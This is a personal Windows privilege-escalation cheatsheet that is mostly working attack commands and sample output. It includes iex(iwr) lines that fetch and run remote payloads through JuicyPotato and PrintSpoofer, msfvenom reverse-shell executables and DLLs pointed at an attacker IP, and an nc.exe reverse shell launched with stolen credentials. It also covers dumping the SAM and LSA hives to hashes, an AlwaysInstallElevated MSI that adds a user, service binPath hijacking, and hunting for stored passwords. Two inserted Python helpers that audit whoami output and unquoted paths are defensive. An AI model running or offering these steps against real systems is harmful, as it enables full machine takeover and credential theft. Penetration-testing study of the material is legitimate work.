this is my windows privilege escalation cheatsheet, gonna keep this growing and updated over time

basic enumeration

PS C:\> whoami
PS C:\> whoami /priv # exploitable privileges?
PS C:\> whoami /groups # administrator?

PS C:\> hostname
PS C:\> ipconfig /all ; route print ; arp -a # network information
PS C:\> netstat -anto | Select-String "listening" # check for services on loopback
PS C:\> netstat -anto | Select-String "established" # check outgoing connections
PS C:\> netsh advfirewall show allprofiles # firewall settings


PS C:\> Get-ChildItem 'Env:' | ft Key,Value # show environment variables


PS C:\> net user # get local users
PS C:\> net user /domain # get domain users
PS C:\> ls -force /Users/ # see home folders
PS C:\> ls -force / # check for interesting files or directories
PS C:\> tree /f /a \Users # check for interesting files
PS C:\> cat (Get-PSReadLineOption).HistorySavePath # read powershell history


PS C:\> Get-Process # check running processes
PS C:\> tasklist /svc # check running processes
PS C:\> tasklist /v /fi "username eq system" # SYSTEM processes
PS C:\> Get-Service # check services


PS C:\> Get-PSDrive # check attached drives

whoami /all

PS C:\> whoami /all # see username, groups and privileges

USER INFORMATION
----------------

User Name            SID                                         
==================== ============================================
client\administrator S-1-5-21-524867371-2016665888-3240400722-500


GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                          Attributes                                                     
============================================= ================ ============================================ ===============================================================
Everyone                                      Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                 Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group             
CLIENT\Group Policy Creator Owners            Group            S-1-5-21-524867371-2016665888-3240400722-520 Mandatory group, Enabled by default, Enabled group             
CLIENT\Domain Admins                          Group            S-1-5-21-524867371-2016665888-3240400722-512 Mandatory group, Enabled by default, Enabled group             
CLIENT\Schema Admins                          Group            S-1-5-21-524867371-2016665888-3240400722-518 Mandatory group, Enabled by default, Enabled group             
CLIENT\Enterprise Admins                      Group            S-1-5-21-524867371-2016665888-3240400722-519 Mandatory group, Enabled by default, Enabled group             
CLIENT\Denied RODC Password Replication Group Alias            S-1-5-21-524867371-2016665888-3240400722-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

the interesting bits to watch out for are:

  • Mandatory Label\High Mandatory Level: the current process is running elevated (high integrity)
  • BUILTIN\Administrators: our user is in the local administrators group
  • CLIENT\Domain Admins: our user is a domain administrator

systeminfo

PS C:\> systeminfo
Host Name:                 DC04
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:           Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA955
Original Install Date:     4/16/2018, 12:09:40 AM
System Boot Time:          4/14/2021, 10:16:19 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,647 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,445 MB
Virtual Memory: In Use:    1,354 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    CLIENT.DOMAIN.COM
Logon Server:              N/A
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB4049065
                           [03]: KB4520724
                           [04]: KB4571694
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.16.4.5
                                 [02]: fe80::8975:cd87:5c81:1f7f
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

interesting things here:

  • OS Name: Microsoft Windows Server 2016 Standard and OS Version: 10.0.14393 N/A Build 14393 can be useful when searching for potential exploits

  • hotfixes

01: KB3199986
02: KB4049065
03: KB4520724
04: KB4571694

the installed hotfixes can be compared against the microsoft security bulletins to find missing patches (for example, the windows-exploit-suggester tool does this by ingesting systeminfo output)

  • System Type: x64-based PC is important information, since we might have to compile binaries for the system to run an exploit or upload tools like netcat, mimikatz and so on. those will need to match the architecture of the target.

common methods

user in local administrator group (UAC bypass)

see if your user is part of an administrative group

PS C:\> whoami /groups # in administrators group
GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                          Attributes                                                     
============================================= ================ ============================================ ===============================================================
Everyone                                      Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group             
user in local admin group  -----------> BUILTIN\Administrators                        Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                 Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group             
but medium integrity process -----------> Mandatory Label\Medium Mandatory Level          Label            S-1-16-8192

check UAC (user account control):

# check if enabled
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object EnableLUA
EnableLUA
---------
        1


# check behavior 
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object ConsentPromptBehaviorAdmin
ConsentPromptBehaviorAdmin
--------------------------
                         5
# 0 -> elevate without prompting
# 1 -> prompt admin for credentials on the secure desktop
# 2 -> prompt admin for consent on the secure desktop
# 3 -> like 1, but on the normal desktop
# 4 -> like 2, but on the normal desktop
# 5 (default) -> prompt admin for consent only for non-windows binaries

in such a situation it might be possible to bypass UAC. there are various exploits you can use depending on the exact windows version, but eventvwr and fodhelper are well known.

note that most UAC bypass exploits utilize DLL hijacking.

privileges

PS C:\> whoami /priv
PS C:\> whoami /groups # local admin?

see also microsoft docs about privileges and this amazing slide from andrea pierini

there are a lot of ways to abuse privileges, but the most common ones are:

  • SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege
  • SeBackupPrivilege // SeRestorePrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
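
an added example, not part of this cheatsheet, that reads `whoami /all` output and reports the things the whoami /all section and the list above say to look for: integrity level, local admin / domain admin membership (with a note when UAC has filtered the admin group to deny-only) and the commonly abused privileges. the sample output inside is constructed.

```python
"""Triage of `whoami /all` output (added example, not the page's own tooling).

Parses the GROUP INFORMATION and PRIVILEGES INFORMATION tables and reports
integrity level, BUILTIN\\Administrators (S-1-5-32-544) or Domain Admins
(RID 512) membership, and the privileges the cheatsheet lists as most abused.
"""
import re
from typing import Dict, List, Tuple

# privileges the cheatsheet singles out as the most commonly abused
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeCreateTokenPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege",
}

# integrity level from the RID of the Mandatory Label SID S-1-16-<rid>
INTEGRITY_LEVELS = {4096: "Low", 8192: "Medium", 12288: "High", 16384: "System"}

# constructed (abridged) `whoami /all` output: a local admin under a UAC-filtered token
SAMPLE = """\
GROUP INFORMATION
-----------------

Group Name                            Type             SID          Attributes
===================================== ================ ============ =================================================
BUILTIN\\Administrators                Alias            S-1-5-32-544 Group used for deny only
BUILTIN\\Users                         Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                State
============================= ========================================== ========
SeChangeNotifyPrivilege       Bypass traverse checking                   Enabled
SeImpersonatePrivilege        Impersonate a client after authentication  Enabled
SeBackupPrivilege             Back up files and directories              Disabled
"""


def table_rows(text: str, title: str) -> List[str]:
    """Data rows of one `whoami /all` table: the lines after its ==== separator."""
    lines = text.splitlines()
    if title not in lines:
        return []
    rows, past_separator = [], False
    for line in lines[lines.index(title) + 1:]:
        if line.startswith("==="):
            past_separator = True
        elif past_separator:
            if not line.strip():
                break
            rows.append(line)
    return rows


def parse_groups(text: str) -> List[Tuple[str, str]]:
    """(SID, attributes) for every row of GROUP INFORMATION."""
    groups = []
    for row in table_rows(text, "GROUP INFORMATION"):
        m = re.search(r"\s(S-1-[\d-]+)\s*(.*)$", row)
        if m:
            groups.append((m.group(1), m.group(2).strip()))
    return groups


def parse_privileges(text: str) -> Dict[str, str]:
    """Privilege name -> 'Enabled' or 'Disabled' from PRIVILEGES INFORMATION."""
    privs = {}
    for row in table_rows(text, "PRIVILEGES INFORMATION"):
        m = re.match(r"(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", row)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage(text: str) -> Dict[str, object]:
    """Summarise the token the way the cheatsheet reads `whoami /all` by eye."""
    groups = parse_groups(text)
    integrity = None
    for sid, _ in groups:
        if sid.startswith("S-1-16-"):
            integrity = INTEGRITY_LEVELS.get(int(sid.rsplit("-", 1)[1]), sid)
    admin_attrs = next((attrs for sid, attrs in groups if sid == "S-1-5-32-544"), None)
    return {
        "integrity": integrity,
        "local_admin": admin_attrs is not None,
        # "Group used for deny only" means UAC filtered the token: admin only after elevation
        "admin_token_filtered": admin_attrs is not None and "deny only" in admin_attrs.lower(),
        "domain_admin": any(s.startswith("S-1-5-21-") and s.endswith("-512") for s, _ in groups),
        # disabled privileges are still held by the token; the process can re-enable them
        "risky_privileges": {p: st for p, st in parse_privileges(text).items() if p in RISKY_PRIVILEGES},
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```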

SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege

if you have a service account with SeImpersonatePrivilege enabled, you are system.

juicy potato

take a look at the original rotten potato paper

you can use juicy potato exploit to spawn a process as nt authority\system by token impersonation:

PS C:\> ./JuicyPotato.exe -t * -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)" -l 1337

printspoofer

PrintSpoofer also works on windows server 2019 with SeImpersonatePrivilege (while JuicyPotato does not)

PS C:\> ./PrintSpoofer64.exe -c "powershell iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)"

SeBackupPrivilege // SeRestorePrivilege

gives you unfettered read/write access to the filesystem. this way we can read important files like the SAM, SECURITY and SYSTEM hives to extract user hashes.

PS C:\Windows\Temp> reg save HKLM\SAM SAM
PS C:\Windows\Temp> reg save HKLM\SYSTEM SYSTEM
PS C:\Windows\Temp> reg save HKLM\SECURITY SECURITY

and then transfer the saved hives to your machine to dump the hashes:

$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8d1b3bcb293ec2bacf262ca05e9827c9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:19a3322455162a546ea115764e41817e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7025790b5bb6b1c87aff52f9fd307ce1:::
joe:1001:aad3b435b51404eeaad3b435b51404ee:45281a1a414c1b153240f4de7f92f1gd:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets    
[*] Cleaning up...                     

SeLoadDriverPrivilege

also see Abusing SeLoadDriverPrivilege. you can load a vulnerable driver and exploit it to get code running in SYSTEM context

PS C:\> sc.exe create Capcom type= kernel binPath= "C:\Users\user\Desktop\Capcom.sys" # sc.exe needs the space after each '='
PS C:\> sc.exe start Capcom

SeTakeOwnershipPrivilege

allows you to take ownership of any object

PS C:\> takeown /f "C:\Program Files"
PS C:\> icacls.exe "C:\Program Files" /grant "$($env:USERNAME):F" # USERNAME, not USER, holds the current user on windows

and then you can modify files as necessary, for example to replace a service executable.

credentials

search for clear text credentials

check these files for exposed credentials:


C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\sysprep\sysprep.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\inetpub\wwwroot\web.config

they can be in different paths, so it might make sense to also search for them:

PS C:\> cmd /c dir /s /b sysprep.xml # search for sysprep.xml

also search file contents for ‘password’ or some other string:

PS C:\Users> findstr /spin "password" *.* # search all files regardless of extension
PS C:\Users> findstr /spin "secret" *.*
PS C:\Users> findstr /spin "password" *.txt *.ini *.config *.xml # search specific extensions

you should search inside Users or Program Files directory to reduce the amount of false positives

search the registry for passwords as well (can be a lot of entries here):

PS C:\> reg query HKLM /f password /t REG_SZ /s
PS C:\> reg query HKCU /f password /t REG_SZ /s

dpapi saved credentials


# credentials
PS C:\> ls -force $env:LOCALAPPDATA/Microsoft/Credentials/
PS C:\> ls -force $env:APPDATA/Microsoft/Credentials/
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-hs-        4/29/2018   1:26 AM            422 45C236B9B8A454F3E4D0538A6F6C5842                            
-a-hs-        5/13/2018   4:28 PM            494 EBBFB3FE75D4A2D06163ED0DA58805FB  


# masterkeys (also check LOCALAPPDATA)
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d---s-        9/18/2020  11:33 AM                S-1-5-21-2291914956-3290296217-2402366952-1122              
-a-hs-        4/24/2018  12:03 AM             24 CREDHIST                      
-a-hs-        9/18/2020   6:03 PM             76 SYNCHIST  
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/S-1-5-21-2291914956-3290296217-2402366952-1122
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-hs-        9/18/2020  11:33 AM            740 3b7bc2e9-40f9-408d-82cd-b09e535fdce0                        
-a-hs-         6/4/2020   4:43 PM            740 4c2003e9-effc-4f96-a468-9b66acfa87a3                        
-a-hs-        4/24/2018  12:03 AM            900 BK-CORP                       
-a-hs-         6/4/2020   4:43 PM            740 d21c87da-fc2a-4d38-b14f-a8e47da3b7a9                        
-a-hs-         6/4/2020   4:43 PM            740 d9091ed6-ca04-4693-8fe3-77f0143318ea                        
-a-hs-        9/18/2020  11:33 AM             24 Preferred 

if you know the user password, you can decrypt the masterkeys using mimikatz (dpapi) and unlock the saved user credentials

recycle bin

# recycle bin is accessible over shell namespace 10
PS C:\> $shell = New-Object -com shell.application
PS C:\> $rbin = $shell.Namespace(10)
PS C:\> $items = $rbin.Items()
PS C:\> $items | select -first 2
PS C:\> $items[0] # or [1], [2], etc.

runas

if you already know the administrator password, you could just spawn a process

PS C:\> runas /env /noprofile /user:Administrator "C:\Windows\System32\cmd.exe" # runas prompts for the password, it cannot be passed on the command line

pscredential

you can create a pscredential if you know a user’s password

PS C:\> $SecPasswd = ConvertTo-SecureString "Password1" -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential("Administrator", $SecPasswd)
PS C:\> $Computer = "DC01"
PS C:\> [System.Diagnostics.Process]::Start("C:\temp\nc.exe", "10.0.13.37 1337 -e cmd", $Cred.UserName, $Cred.Password, $Computer) # overload: file, arguments, user, password, domain

misconfigurations

insecure permissions

look for files and programs with insecure permissions using accesschk.exe from Windows Sysinternals

# show effective access of current user
# -u suppress errors
# -s recurse
# -w show only writable
PS C:\> ./accesschk.exe -accepteula -wsu C:\*.* 

# weak directory permissions, writable dirs
PS C:\> ./accesschk.exe -accepteula -wsud "Everyone" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Users" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Authenticated Users" C:\*.*

# -c check services permissions (use * for all)
PS C:\> ./accesschk.exe -accepteula -wsuc * # current user
PS C:\> ./accesschk.exe -accepteula -wsuc "Everyone" * 
PS C:\> ./accesschk.exe -accepteula -wsuc "Authenticated Users" *

writable service executables can then be replaced with malicious executables or dlls. the malicious code runs when the service is restarted (a reboot can also work).

also check for file permissions using icacls:

PS C:\> icacls "C:\Program Files\*" | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users $env:USERNAME"
PS C:\> icacls "C:\Program Files (x86)\*" | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users $env:USERNAME"
PS C:\Program Files\> icacls.exe * | findstr "(F)" # full access
PS C:\Program Files\> icacls.exe * | findstr "(M)" # modify access

always install elevated

check if AlwaysInstallElevated is set to 1:

PS C:\> Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer
PS C:\> Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer

if this value is set, you can create an msi package and install it with elevated privileges

$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi -o evil.msi
$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi-nouac -o evil.msi
PS C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi

service manipulation

you can look for:

  • modifiable service
  • writable service executable
  • unquoted service path
  • hijackable dll

in most cases if any of those are present, you can get code execution as that service’s user (usually SYSTEM). as you can imagine, this goes hand in hand with insecure permissions :)

# show services
PS C:\> Get-Service

# get list of all service names
PS C:\> sc.exe query | select-string service_name 

# check the configuration of a specific service
PS C:\> sc.exe qc <ServiceName> 

# check permissions for specific service
PS C:\> sc.exe sdshow <ServiceName>

# get executable path for all processes
PS C:\> wmic process list full | select-string 'executablepath=C:' 
PS C:\> wmic process list full | select-string 'executablepath=C:' | select-string -notmatch 'system32|syswow'

once you have found a vulnerable service, you could escalate by changing, for example, its binPath attribute:

create a malicious service executable:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.13.37 LPORT=1337 -f exe-service -o shell_svc.exe
# CVE-2019-1322 UsoSvc - Windows 10
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config UsoSvc binPath= "C:\Windows\System32\spool\drivers\color\shell_svc.exe"
PS C:\Windows\system32> sc.exe qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spool\drivers\color\shell_svc.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

PS C:\Windows\system32> sc.exe start UsoSvc


# upnphost on Windows XP
C:\> sc.exe config upnphost binpath= "C:\Windows\System32\spool\drivers\color\shell_svc.exe"
C:\> sc.exe config upnphost obj= ".\LocalSystem" password= ""
C:\> sc.exe qc upnphost
C:\> sc.exe config upnphost depend= ""
C:\> sc.exe start upnphost

unquoted paths

if the path to an executable doesn’t have quotes around it, windows will try every prefix that ends before a space as the executable, in order. for example, if the path is C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe (i’m referring to this exploit) then windows will try executing:

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\IObit.exe
C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe

we can take advantage of this behavior if we have write privileges to C:\Program Files (x86)\IObit\

# check for unquoted paths in services
PS C:\> wmic service get name,pathname | select-string -notmatch '"|^$'

# check only non-windows services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'

# check only auto started services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string "auto" | select-string -notmatch 'C:\\Windows|"|^$'

if any of the paths don’t have quotes around them and contain spaces, check whether you can write to one of the directories along the unquoted path (icacls)
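
an added example, not part of the original cheatsheet, that automates the check above: it reads `wmic service get name,pathname` output, expands each unquoted path into the executables windows would try (as listed for IUService.exe above), and reports the directories whose write permissions need checking with icacls. the wmic sample is constructed; apart from the IObit path it uses made-up service names.

```python
"""Audit helper for unquoted service paths (added example, not from the page).

Takes the text output of `wmic service get name,pathname`, finds services whose
binary path is unquoted and contains spaces, expands each into the executables
Windows would try before the real one, and lists the directories whose ACLs
decide whether one of those bogus executables could be created.
"""
import ntpath
import re
from typing import Dict, List

# constructed `wmic service get name,pathname` output (not from a real host)
SAMPLE_WMIC = """\
Name       PathName
IUService  C:\\Program Files (x86)\\IObit\\IObit Uninstaller\\IUService.exe
Spooler    C:\\Windows\\System32\\spoolsv.exe
GoodSvc    "C:\\Program Files\\Good Vendor\\svc.exe" -k net
ArgSvc     C:\\Tools\\Acme Agent\\agent.exe -k netsvcs
"""


def candidate_paths(pathname: str) -> List[str]:
    """Executables CreateProcess would try, in order, for an unquoted PathName.

    The image path is taken up to the first ".exe"; every prefix that ends at a
    space gets ".exe" appended, and the real executable comes last.
    """
    m = re.search(r"\.exe", pathname, re.IGNORECASE)
    exe = pathname[: m.end()] if m else pathname.strip()
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def find_unquoted(wmic_output: str) -> Dict[str, List[str]]:
    """Service name -> candidate executables, for every unquoted path with spaces."""
    findings = {}
    for row in wmic_output.strip().splitlines()[1:]:  # skip the header row
        parts = re.split(r"\s{2,}", row.strip(), maxsplit=1)
        if len(parts) != 2:
            continue
        name, pathname = parts
        if pathname.startswith('"'):
            continue  # properly quoted, not affected
        candidates = candidate_paths(pathname)
        if len(candidates) > 1:
            findings[name] = candidates
    return findings


def directories_to_check(candidates: List[str]) -> List[str]:
    """Parent directories of the bogus paths: these are the ACLs to review with icacls."""
    dirs = []
    for path in candidates[:-1]:
        parent = ntpath.dirname(path)
        if parent not in dirs:
            dirs.append(parent)
    return dirs


if __name__ == "__main__":
    for svc, cands in find_unquoted(SAMPLE_WMIC).items():
        print(f"{svc}: unquoted path with spaces")
        for c in cands:
            print(f"    tries {c}")
        print("    check write ACLs on:", ", ".join(directories_to_check(cands)))
```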

dll hijacking

when a windows process wants to load a dll file, it goes through the following to search for it:

  • directory where process was launched
  • C:\Windows\System32
  • C:\Windows\System
  • C:\Windows\
  • current working directory
  • directories in order from system PATH
  • directories in order from user PATH

so if you can do any of:

  • writing in a system folder
  • writing to a non-default program install directory (e.g., C:\Python27)
  • restart a service running as SYSTEM (a missing dll can be identified using procmon)

then you can get SYSTEM privileges by loading a malicious dll.

use icacls to check write permissions on those directories

create malicious dll:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.13.37 LPORT=1337 -f dll -o malicious.dll

scheduled tasks

check scheduled tasks for anything interesting

PS C:\> schtasks /query /fo LIST
PS C:\> Get-ScheduledTask

startup

check startup programs for anything out of the ordinary

PS C:\> wmic startup
PS C:\> wmic startup get caption,command
PS C:\> Get-ChildItem "C:\Users\*\Start Menu\Programs\Startup" # check all users startup dirs

exploits

vulnerable software

get a list of installed software on the machine:

PS C:\> get-package | select-object name,version # will list installed software and versions
PS C:\> Get-ChildItem HKLM:\SOFTWARE | ft Name # check the registry too
PS C:\> ls -force -Path 'C:\Program Files*\*' | ft Parent,Name,LastWriteTime # also the program directories

the list can then be cross-checked against exploit-db, looking for local privilege escalation vulnerabilities like unquoted paths or insecure permissions.

vulnerable drivers

check if any vulnerable drivers are installed. since they run in SYSTEM context, they can be a good target for exploitation.

PS C:\> driverquery # get a list of installed drivers
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name' | fl
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name', 'Display Name', 'Start Mode', 'Path' | fL
PS C:\> DriverQuery.exe --no-msft # OffensiveCSharp DriverQuery
[+] Enumerating driver services...
[+] Checking file signatures...
Intel(R) Serial IO GPIO Controller Driver
    Service Name: iaLPSSi_GPIO
    Path: C:\Windows\System32\drivers\iaLPSSi_GPIO.sys
    Version: 1.1.250.0
    Creation Time (UTC): 7/16/2016 1:18:02 PM
    Cert Issuer: CN=Intel External Basic Issuing CA 3B, O=Intel Corporation, L=Santa Clara, S=CA, C=US
    Signer: CN=Intel Corporation - Client Components Group, O=Intel Corporation, L=Santa Clara, S=CA, C=US

PS C:\> DriverQuery.exe --no-msft | select-string 'name|version|^$' # get name/version list
    Service Name: iaLPSSi_GPIO
    Version: 1.1.250.0

    Service Name: pvscsi
    Version: 1.3.15.0

    Service Name: vm3dmp
    Version: 8.16.01.0024

    Service Name: vm3dmp-debug
    Version: 8.16.01.0024

    Service Name: vm3dmp-stats
    Version: 8.16.01.0024

    Service Name: vm3dmp_loader
    Version: 8.16.01.0024

    Service Name: vmci
    Version: 9.8.16.0

    Service Name: VMMemCtl
    Version: 7.4.2.0

    Service Name: vmmouse
    Version: 12.5.7.0

    Service Name: vmusbmouse
    Version: 12.5.4.0

    Service Name: vsock
    Version: 9.8.16.0

windows kernel exploits

PS C:\> systeminfo | Select-String "os name|os version|system type"
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
PS C:\> wmic qfe get HotFixID
HotFixID
KB3199986
KB4049065
KB4520724
KB4571694

then use searchsploit, or search online for an exploit based on these. for example, searches based on this could be:

windows server 2016 "10.0.14393" exploit
KB4571694 site:microsoft.com

also check the following resources:

antivirus and other mitigations

windows defender

# see if windows defender is running
PS C:\> Get-Service windefend
Status   Name               DisplayName                           
------   ----               -----------                           
Running  windefend          Windows Defender Service              


# check status
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled                : True
AntispywareEnabled              : True
AntivirusEnabled                : True
BehaviorMonitorEnabled          : True
IoavProtectionEnabled           : True
NISEnabled                      : True
OnAccessProtectionEnabled       : True
RealTimeProtectionEnabled       : True

# check preferences
PS C:\> Get-MpPreference | findstr /i "disable enable scan" | findstr /i "true false"
CheckForSignaturesBeforeRunningScan           : False
DisableArchiveScanning                        : False
DisableAutoExclusions                         : False
DisableBehaviorMonitoring                     : False
DisableBlockAtFirstSeen                       : False
DisableCatchupFullScan                        : True
DisableCatchupQuickScan                       : True
DisableDatagramProcessing                     : False
DisableEmailScanning                          : True
DisableIOAVProtection                         : False
DisablePrivacyMode                            : False
DisableRealtimeMonitoring                     : False
DisableRemovableDriveScanning                 : True
DisableRestorePoint                           : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles                   : False
DisableScriptScanning                         : False
